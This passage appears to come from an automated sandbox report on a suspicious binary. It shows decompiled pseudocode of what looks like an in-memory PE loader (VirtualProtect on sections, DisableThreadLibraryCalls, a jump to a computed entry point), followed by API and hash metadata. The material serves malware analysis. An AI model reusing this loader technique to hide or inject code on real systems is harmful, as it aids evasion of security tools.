                                                                                                                                                  						_t199 =  *(_t221 + 0x24);
                                                                                                                                                  						_v156 = _v152;
                                                                                                                                                  						_v160 = _t199 >> 0x0000001e & 0x00000001;
                                                                                                                                                  						_v164 = _t199 >> 0x1f;
                                                                                                                                                  						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
                                                                                                                                                  						_v184 =  *((intOrPtr*)(_t221 + 8));
                                                                                                                                                  						_v180 =  *((intOrPtr*)(0xbf4418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
                                                                                                                                                  						_v176 =  &_v44;
                                                                                                                                                  						_v168 = _t221;
                                                                                                                                                  						_t182 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                                  						_t272 = _t272 - 0x10;
                                                                                                                                                  						_t223 = _v156 + 1;
                                                                                                                                                  						_v172 = _t182;
                                                                                                                                                  						_v148 = _v168 + 0x28;
                                                                                                                                                  						_v152 = _t223;
                                                                                                                                                  						if(_t223 == _v60) {
                                                                                                                                                  							goto L5;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L5:
                                                                                                                                                  				 *_t272 = _v68;
                                                                                                                                                  				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
                                                                                                                                                  				_t155 = DisableThreadLibraryCalls(??);
                                                                                                                                                  				_t273 = _t272 - 4;
                                                                                                                                                  				_t234 =  *_v100;
                                                                                                                                                  				_v140 = _t155;
                                                                                                                                                  				_v136 = _t234;
                                                                                                                                                  				_v112 = _v68;
                                                                                                                                                  				if(_t234 == 0) {
                                                                                                                                                  					L2:
                                                                                                                                                  					_t245 = _v48;
                                                                                                                                                  					_v40 =  *((intOrPtr*)(_t245 + 0x34));
                                                                                                                                                  					_v36 =  *((intOrPtr*)(_t245 + 8));
                                                                                                                                                  					_v32 =  *((intOrPtr*)(_t245 + 0x30));
                                                                                                                                                  					_v28 =  *((intOrPtr*)(_t245 + 0x28));
                                                                                                                                                  					_v24 =  *((intOrPtr*)(_t245 + 0x50));
                                                                                                                                                  					_v20 = _v116;
                                                                                                                                                  					 *_t273 = _t245;
                                                                                                                                                  					_v188 = 0;
                                                                                                                                                  					_v184 = 0x74;
                                                                                                                                                  					_v120 =  &_v40;
                                                                                                                                                  					_v124 = 0;
                                                                                                                                                  					_v128 = 0x74;
                                                                                                                                                  					_v132 =  *((intOrPtr*)(_v112 + 0x28));
                                                                                                                                                  					E00BF2798();
                                                                                                                                                  					if(_v132 != 0) {
                                                                                                                                                  						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
                                                                                                                                                  						goto __eax;
                                                                                                                                                  					}
                                                                                                                                                  					return 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                  					goto L2;
                                                                                                                                                  				}
                                                                                                                                                  			}

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.385753164.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID: t
                                                                                                                                                  • API String ID: 544645111-2238339752
                                                                                                                                                  • Opcode ID: eace634c887fde5df4a0b95479205246a737b2b84079743ca2ba914d3a11f7bf
                                                                                                                                                  • Instruction ID: f39c10e3ce5763dfe33d68609946107a4c8322fa48a8fb2da5b3f993cf37acfd
                                                                                                                                                  • Opcode Fuzzy Hash: eace634c887fde5df4a0b95479205246a737b2b84079743ca2ba914d3a11f7bf
                                                                                                                                                  • Instruction Fuzzy Hash: 60B19BB4D00218DFCB14CF69C980AADBBF1BF88314F5585AAE948AB351D730A985CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.385753164.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                                                                  • Instruction ID: 1d9f8b3bd781d6d0b5bfff30c72a82b1190e59b7fe6092bcaf892195f7060b20
                                                                                                                                                  • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                                                                  • Instruction Fuzzy Hash: 3241F2B5E0521ADFDB08DF98D490AAEBBF0FF48310F15896DE949AB340D375A844CB94
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions